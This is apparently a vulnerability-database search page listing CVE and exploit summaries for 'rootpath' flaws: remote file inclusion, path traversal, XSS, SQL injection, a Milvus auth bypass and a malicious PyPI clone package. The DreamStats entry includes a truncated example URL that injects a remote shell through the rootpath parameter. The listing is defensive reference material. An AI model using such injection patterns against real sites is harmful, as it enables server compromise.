16 matches found
CVE-2026-26190
Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath...
Malicious code in python-rootpath (PyPI)
Source: kam193 bb867560d676e7b79ce110b230906a9630feb223cbcb6072bff5a2636c60a3c7 Hidden code downloads, saves and imports a remote script. The package itself is a clone of a legitimate "rootpath". At the time of analysis, the remote script d...
MAL-2025-191841 Malicious code in python-rootpath (PyPI)
Source: kam193 bb867560d676e7b79ce110b230906a9630feb223cbcb6072bff5a2636c60a3c7 Hidden code downloads, saves and imports a remote script. The package itself is a clone of a legitimate "rootpath". At the time of analysis, the remote script d...
CVE-2024-29470
OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component rootpath/links...
CVE-2019-17175
joyplus-cms 1.6.0 allows manager/adminpic.php?rootpath= absolute path traversal...
CVE-2019-17175
joyplus-cms 1.6.0 allows manager/adminpic.php?rootpath= absolute path traversal...
s-cms 2.5 - Multiple Vulnerabilities
No description provided by source. Exploit Title: S-CMS Multiple Vuln Date: 14/11/2010 Author: LordTittiS Greetings To: GodOfPain, SystemOveride Software Link: http://www.matteoiammarrone.com http://www.matteoiammarrone.com/public/s-cms...
Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability
No description provided by source. Exploit Title: Punbb 1.3.4 Full Path Disclosure Date: 07/11/2010 Author: SYSTEMOVERIDE, OverSecurityCrew Software Link: http://punbb.informer.com/ Vulnerability Type: Full Path Disclosure Version: 1.3.4 Vulnerability Details: The vulnerabilities are in the file...
Invision Power Board 3 - 'search_app' SQL Injection
Exploit Title: Invision Power Board 3 Multiple Vuln Date: 13/11/2010 Author: LordTittiS Greetings To: GodOfPain, SystemOveride Software Link: http://www.invisionpower.com/ Vulnerability Type: Full Path Disclosure Version: 3.x.x All 3...
Punbb 1.3.4 Full Path Disclosure Vulnerability
Exploit for php platform in category web applications. Punbb 1.3.4 Full Path Disclosure Vulnerability. Exploit Title: Punbb 1.3.4 Full Path Disclosure Date: 07/11/2010 Author: SYSTEMOVERIDE, OverSecurityCr...
MetInfo 3.0 - PHP Code Injection
Exploit Title: MetInfo 3.0 PHP Code Injection Vulnerability Date: 2010-10-31 Author: linux520.com Team: http://www.linux520.com/ Vendor: http://www.metinfo.cn/ Dork: "Powered by MetInfo 3.0 " Google: 400,000 + results Price: free Language: PHP Greetz: CCAV +Description: at 67 line of...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in Direct News 4.10.2, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter to (1) admin/menu.php and (2) library/lib.menu.php; and the adminroot parameter to (3)...
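DreamStats System Rootpath Remote File Inclusion Vulnerability
DreamStats is a PHP-based web application. DreamStats does not properly filter user-submitted input, so a remote attacker can exploit the vulnerability to execute arbitrary commands with web privileges. The problem is that the 'index.PHP' script does not filter the user-submitted 'rootpath' parameter; specifying a file on a remote server as the include parameter can lead to arbitrary command execution with web privileges. mnProjects Dreamstats 4.2 No solution is currently available: http://www.mnprojects.com/dreamstats/ http://www.example.com/PaTh/index.php?rootpath=Shell...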
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in Miguel Nunes Call of Duty 2 (CoD2) DreamStats System 4.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...
CVE-2006-5480
PHP remote file inclusion vulnerability in lib/rs.php in 2le.net Castor PHP Web Builder 1.1.1 allows remote attackers to execute arbitrary PHP code via the rootpath parameter...
PT-2006-2939 · Unknown · Rechnungszentrale V2
Name of the Vulnerable Software and Affected Versions: RechnungsZentrale V2 versions 1.1.3 and earlier Description: A remote file inclusion issue in the authent.php4 file allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter. Recommendations: For...